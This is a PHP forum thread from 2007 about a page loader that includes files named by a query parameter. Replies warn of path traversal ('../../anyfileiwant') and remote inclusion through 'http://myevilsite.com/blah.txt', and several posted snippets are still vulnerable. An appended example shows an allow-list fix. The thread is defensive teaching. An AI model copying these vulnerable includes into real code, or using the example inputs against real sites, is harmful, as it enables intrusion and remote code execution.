A simple include script problem!
Posted: Sun Oct 07, 2007 3:33 pm
by glav
feyd | Please use [code] and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: Posting Code in the Forums (http://forums.devnetwork.net/viewtopic.php?t=21171) to learn how to do it too.
OK - I have a small problem but it's bugging me out.
The little script I'm using is
Code:
<?php
// $a is not assigned anywhere in the script; it only exists if register_globals
// turns the ?a=... query parameter into a variable
if (@$a) {
    include $a . ".inc";
} else {
    include "main.inc";
}
?>
First of all, I think I should ask these questions one at a time and get the answer for the first one before asking the second.
That's for my own benefit, so I don't get confused.
Question 1: In this script, if the value for $a does not exist, does the script then load main.php, or does it only load main.php when the variable is not passed?
What I mean is this:
http://www.sitename.com/index.php?a=nosuchfile
Does main.php load?
OR
http://www.sitename.com/index.php
Only loads when the variable is not passed?
Or does it load for both cases?
Thanks
Posted: Sun Oct 07, 2007 3:36 pm
by feyd
There's a thread linked from Useful Posts you need to read regarding this type of code.
Posted: Sun Oct 07, 2007 3:39 pm
by Zoxive
What's with the error suppression?
Code:
if (!empty($_GET['a'])) {
    // $_GET['a'] also should be filtered/escaped/checked
    include($_GET['a'] . '.inc'); // Edit: forgot `.`
} else {
    include('main.inc');
}
Posted: Sun Oct 07, 2007 3:47 pm
by glav
Zoxive, I tried that and got the error.
Warning: main(jetlagphp) [function.main]: failed to open stream:
the '.' is missing
so I put it in and tried to call a page that does not exist and I got this error
Warning: main(jetlag2.php) [function.main]: failed to open stream:
and yes the extension I use is .php not .inc
Thanks
Posted: Sun Oct 07, 2007 3:55 pm
by Zoxive
glav wrote: Zoxive, I tried that and got the error.
Warning: main(jetlagphp) [function.main]: failed to open stream:
the '.' is missing
so I put it in and tried to call a page that does not exist and I got this error
Warning: main(jetlag2.php) [function.main]: failed to open stream:
and yes the extension I use is .php not .inc
Thanks
Well, you need to do more checking.
Right now it is only seeing if the variable $_GET['a'] exists, and then it tries to include it.
Code:
$Ext = '.php';
// I would like to note again..
// $_GET['a'] also should be filtered/escaped/checked
if (!empty($_GET['a']) && file_exists($_GET['a'] . $Ext)) {
    include($_GET['a'] . $Ext);
} else {
    include('main.inc');
}
If I go to your site, I could easily put sitename.com/index.php?a=../../anyfileiwant
Posted: Sun Oct 07, 2007 4:19 pm
by glav
Zoxive, first of all the '.' was not missing, it was my mistake.
When I try the new piece of code you wrote, it only loads the main.php page even if the value for a exists.
Thanks for the help.
Posted: Sun Oct 07, 2007 4:23 pm
by feyd
Have you read the thread I referred to in the first response?
Posted: Sun Oct 07, 2007 4:26 pm
by glav
feyd, I'm reading it at the moment.
OK, I've finished reading that; some snarky posts there, lots of fun.
Did it help? Yes, a little, but I'll have to read a little more before I understand everything that was mentioned.
Thanks
Posted: Sun Oct 07, 2007 6:45 pm
by glav
OK Zoxive & feyd, I figured out why this was not working for me. I am using this on a new site that is based around a premade app that I wanted to use. When I tried your script, Zoxive, it did the same thing my own version did, and when I tried it on a site without the premade app it worked fine. The reason was because I had to put the location in the file_exists function like this:
Code:
$Ext = '.php';
// I would like to note again..
// $_GET['a'] also should be filtered/escaped/checked
// the existence check looks in template/hhi/; the include itself finds the file via the include path
if (!empty($_GET['a']) && file_exists("template/hhi/" . $_GET['a'] . $Ext)) {
    include($_GET['a'] . $Ext);
} else {
    include('main.inc');
}
This was because the index.php file was in wwwroot/or/ and the values for $a were in wwwroot/or/template/hhi/
What I need to figure out is how to load the premade app into the wwwroot/ dir and load the $a values from there also.
Thanks for the help.
Posted: Sun Oct 07, 2007 6:48 pm
by Zoxive
I have yet to acquire the ability to read minds, and to know exactly what the structure of your website is, to give you exact code.
On a serious note, we are here to help you learn, give advice and point you in the right direction. So when you get code examples here (IF you do; I was feeling generous today), most of the time you still need to tweak them to your apps.
Posted: Mon Oct 08, 2007 5:39 am
by glav
Even though I have read the thread feyd forwarded me to, I'm still a little confused about what steps I should use to secure the include method.
I need to make sure that the files are in certain folders only and that a hacker cannot enter index.php?a=../../../somefile
Would this be enough, or am I still prone to an easy attack?
Thanks
Posted: Mon Oct 08, 2007 11:50 am
by RobertGonzalez
Read that thread carefully. There are a lot of security topics covered in there, all of which you should use when allowing dynamic includes from user input.
Posted: Mon Oct 08, 2007 2:46 pm
by mrkite
Even worse, make sure a hacker can't say index.php?a=http://myevilsite.com/blah.txt
because PHP will download blah.txt and execute the PHP code in it as if it were running locally.
I find it easiest to just do:
Code:
// strip every '/' so neither a path nor a URL survives into the include
$_GET['a'] = preg_replace('|/|', '', $_GET['a']);
Which should prevent people from passing paths or URLs to your include statement.
Posted: Mon Oct 08, 2007 3:08 pm
by RobertGonzalez
The safest way would be to not allow users to tell your application which page to include directly.
Posted: Mon Oct 08, 2007 3:09 pm
by s.dot
A much more elegant solution would use file_exists() on the include file. An even more elegant solution wouldn't pass the filename via $_GET, but instead perhaps a number which indicates a specific file.
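Putting together the advice from Zoxive (check the file), mrkite (no paths or URLs), RobertGonzalez (don't let the user name the file) and s.dot (map a key to a file), here is an added example of a page loader written for this thread; it is not code from any of the posters. The template/hhi directory and the page names are assumed placeholders taken from glav's description.

```php
<?php
// Added example: the request parameter is only ever used as a key into an
// allow-list, so neither "../../etc/passwd" nor "http://evil/x.txt" can reach
// include(). realpath() plus a prefix check confirms the resolved file really
// lives under PAGE_DIR, which also defends against a badly edited allow-list.
declare(strict_types=1);

const PAGE_DIR     = __DIR__ . '/template/hhi';   // assumed layout from the thread
const DEFAULT_PAGE = 'main';

// Allow-list: request key => file name. No user-supplied text is used as a path.
const PAGES = [
    'main'   => 'main.php',
    'jetlag' => 'jetlag.php',   // assumed page name
    'about'  => 'about.php',    // assumed page name
];

/**
 * Resolve the ?a= value to an absolute path inside PAGE_DIR, or null when the
 * key is unknown or the file is missing / outside the directory.
 */
function resolve_page(?string $requested): ?string
{
    $key = ($requested === null || $requested === '') ? DEFAULT_PAGE : $requested;
    if (!array_key_exists($key, PAGES)) {
        return null;                       // unknown key: refuse rather than guess
    }
    $base = realpath(PAGE_DIR);
    $file = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $file === false) {
        return null;                       // directory or file does not exist
    }
    // Containment check: the canonical file path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

$page = resolve_page($_GET['a'] ?? null);
if ($page === null) {
    // Same behaviour the thread wants: anything unknown falls back to the main page.
    $page = resolve_page(DEFAULT_PAGE);
}
if ($page !== null) {
    include $page;
}
```

With this shape the filesystem is never asked about a name the attacker chose, which is what makes the file_exists() check safe to rely on.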